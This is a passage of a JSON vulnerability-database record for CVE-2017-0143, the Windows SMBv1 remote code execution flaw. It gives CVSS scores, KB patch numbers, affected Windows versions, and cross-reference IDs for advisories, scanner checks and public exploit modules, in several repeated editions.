"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T12:43:31", "differentElements": ["msAffectedSoftware"], "edition": 52}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T16:50:29", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012212", "KB3205409", "KB4012214", "KB4012606", "KB4012598", "KB3213986", "KB3205401", "KB4012217", "KB4012215", "KB3210720", "KB3210721", "KBMS16-110, 3187754", "KB4013429", "KB4012216", "KB3212646", "KB3177186", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T16:50:29", "differentElements": ["msAffectedSoftware"], "edition": 53}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T18:44:02", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
